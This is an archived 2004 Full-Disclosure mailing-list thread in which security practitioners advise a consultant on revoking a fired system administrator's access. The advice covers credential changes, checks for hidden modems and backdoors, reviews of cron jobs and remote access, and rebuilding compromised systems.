Changing passwords would be a good move. It may be worth cracking the old password - if it's not known - and doing a quick scan of scripts just to make sure the admin password isn't embedded in a script (an appalling practise that should be eliminated ... but you don't want to wait for something to fail before finding out about it)
Make sure that everybody knows that the admin is no longer allowed access to the system (everybody! you don't want the admin to be able to call a remote user and get their credentials). Advise any service providers or support organisations who may otherwise assume that the admin has access to systems. If you have any external services which allow automated updates (Domain registration details, nameserver details) then you need to change these authentication credentials as well. Make sure that any physical access credentials that the admin may have known get changed (keycode entry systems etc) If you have any remote access systems then make sure these are completely reviewed - if they are a black box solution (cisco, nortel etc) - with very little opportunity for software modifications then have the configuration checked by an expert. If your remote access system is home-grown (windows, Linux etc) then you may want to reinstall from scratch - just to make sure there aren't any backdoors. If you are using passwords for remote access then all passwords must be changed... not just the admin's password (I recommend using two-factor authentication for remote access anyway). If you allow on-demand connections to other networks (analog or ISDN) you should change the authentication (PAP/CHAP password etc) ... I know you can't trust CallerID for analog circuits - I'm not sure about ISDN. Admin passwords on the network equipment should be changed as well. Check your system connections looking for any modems or wireless access points that the admin may have installed to make their access easier (I've heard of an admin who installed a modem and hid it under the raised floor in a systems room ... so that he could have access to the company's extensive library even after he left the company ... he was still using it a year after he left!). You will need to check everywhere Any dial-out solutions you have will also need to be checked (connection to dial-out banking services, payroll, links for internet testing etc) ... even though they are supposedly dial-out they may have a dial-in facility (which the admin knows about) Get a list of all analog and ISDN lines from your accounts dept and make sure you know what each line is used for Unfortunately, having been an admin he/she may have previously cracked people passwords (to test the password strength) or users may have disclosed their password. So all passwords should be expired (bear in mind that people may use the same password in multiple systems, so the password may need to be expired in systems that weren't administered by the rogue admin). Lock down as much as you can at the outset - if you have any systems which hold particularly sensitive data then pay them special attention (check code checksums against supplier checklists) go through all listening network services, check cron jobs and boot scripts ... if unsure, rebuild the system. You can't do much about data they stole while they were a valid administrator, however, if this could include sensitive personal data you may need to inform the authorities. You can't really contend for an admin who just 'turns bad' - obviously most companies want to keep their employees motivated and (where possible) happy and that should apply to the admin as much as anyone else. Having multiple admins can be a benefit - or regular audits from a contracted admin. Make sure the admin takes all his/her holidays and have a suitably expert replacement while they're away. An admin with a grudge is a great inconvenience - it's always worthwhile expending time and money at the outset - to fully check the references and ensure there are no recorded offences which ring alarm bells for you. From: "Michael T. Harding" <[EMAIL PROTECTED]> To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Removing Fired admins Date: Fri, 13 Feb 2004 11:01:46 -0500 <html><div style='background-color:'><DIV class=RTE> <P>Guys;</P> <P>Thanks for the input and I love the philosophical debate about how this happened, what I can do in the future to prevent it, etc.</P> <P>A little more info; I am being brought in to help consult on this project, the ex-admin is, well, let's just say the local and state law enforcement teams are being brought in today to assist, and therefore the problem is probably pretty deep. He has been a fully entrenched admin since the inception of the agency.</P> <P>What I really am looking for is some kind of checklist/ information sheet so we don't forget anything major, at least to check.</P> <P> </P> <P>Depending on what we might find today, the decision is already on the table as to whether we should treat this as a total breech and scrub the whole plant and start over. That remains to be seen.</P> <P>While an automated solution would be great to have, I don't have time to research them before we get to work. (I am of the belief that they won't work well anyway but that is another debate.)</P> <P>Does anyone know of a SANS, or GIAC or any other security body who has a "minder" list of some sort? I know others have gone through this and have learned some lessons, both good and bad ones, that I hope they can share.</P> <P>If not, I will try and document what we do and maybe look to publish something for future reference.</P> <P>Thanks,<BR><BR></P></DIV> <DIV></DIV>>From: "James Patterson Wicks" <[EMAIL PROTECTED]> <DIV></DIV>>To: [EMAIL PROTECTED] <DIV></DIV>>Subject: RE: [Full-Disclosure] Removing FIred admins <DIV></DIV>>Date: Fri, 13 Feb 2004 08:06:57 -0500 <DIV></DIV>> <DIV></DIV>>Only the senior administrator and the CTO have the root password to the <DIV></DIV>>Unix systems. The senior admin does not "own" and servers, but is the <DIV></DIV>>manager for all of the other admins. Could he get mad and make changes <DIV></DIV>>to the interpreter, but the server "owner" would notice this and check <DIV></DIV>>the changes against the change management log. Any unusual events would <DIV></DIV>>be sent to the CTO. <DIV></DIV>> <DIV></DIV>>Like you said, there is no magic button to press and instantly remove an <DIV></DIV>>admin's influence from an enterprise. BUT if you have a good process in <DIV></DIV>>place that leverages existing technologies, you can do a good job of <DIV></DIV>>protecting your enterprise. Admins leave companies all the time, but <DIV></DIV>>enterprises continue to operate without a problem. <DIV></DIV>> <DIV></DIV>>If all else fails, make sure that the company lawyer is in the office <DIV></DIV>>when you fire the admin. A good threat can go a long way. <DIV></DIV>> <DIV></DIV>>-----Original Message----- <DIV></DIV>>From: [EMAIL PROTECTED] <DIV></DIV>>[mailto:[EMAIL PROTECTED] On Behalf Of Volker <DIV></DIV>>Tanger <DIV></DIV>>Sent: Friday, February 13, 2004 2:51 AM <DIV></DIV>>To: [EMAIL PROTECTED] <DIV></DIV>>Subject: Re: [Full-Disclosure] Removing FIred admins <DIV></DIV>> <DIV></DIV>>Hi! <DIV></DIV>> <DIV></DIV>> > We are working on something called "The Button", which is nothing but <DIV></DIV>> > small script that activates a series of scripts that change all root, <DIV></DIV>> > local and domain administrator passwords on our Unix and Windows <DIV></DIV>> > servers when run. <DIV></DIV>> <DIV></DIV>>The ex-admin had ROOT access to "his" servers, right? So he can change <DIV></DIV>>ANYTHING, right? Including the script, e.g. like NOT changing passwords <DIV></DIV>>or adding secret admin-level accounts, right? <DIV></DIV>> <DIV></DIV>>You said "script", so it uses BASH, PERL or something. ROOT can change <DIV></DIV>>anything, right? So he could have changed the BASH, PERL interpreter or <DIV></DIV>>something, right? <DIV></DIV>> <DIV></DIV>>There is no technical solution to a social problem - well, except in <DIV></DIV>>this case maybe reformatting the disks and reinstalling from scratch and <DIV></DIV>>clean media. <DIV></DIV>> <DIV></DIV>>Sorry <DIV></DIV>> <DIV></DIV>>Volker Tanger <DIV></DIV>>ITK-Security <DIV></DIV>> <DIV></DIV>>_______________________________________________ <DIV></DIV>>Full-Disclosure - We believe in it. <DIV></DIV>>Charter: http://lists.netsys.com/full-disclosure-charter.html <DIV></DIV>> <DIV></DIV>> <DIV></DIV>>This e-mail is the property of Oxygen Media, LLC. It is intended only for the person or entity to which it is addressed and may contain information that is privileged, confidential, or otherwise protected from disclosure. Distribution or copying of this e-mail or the information contained herein by anyone other than the intended recipient is prohibited. If you have received this e-mail in error, please immediately notify us by sending an e-mail to [EMAIL PROTECTED] and destroy all electronic and paper copies of this e-m ___________________________________________________________ BT Yahoo! Broadband - Free modem offer, sign up online today and save £80 http://btyahoo.yahoo.co.uk _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html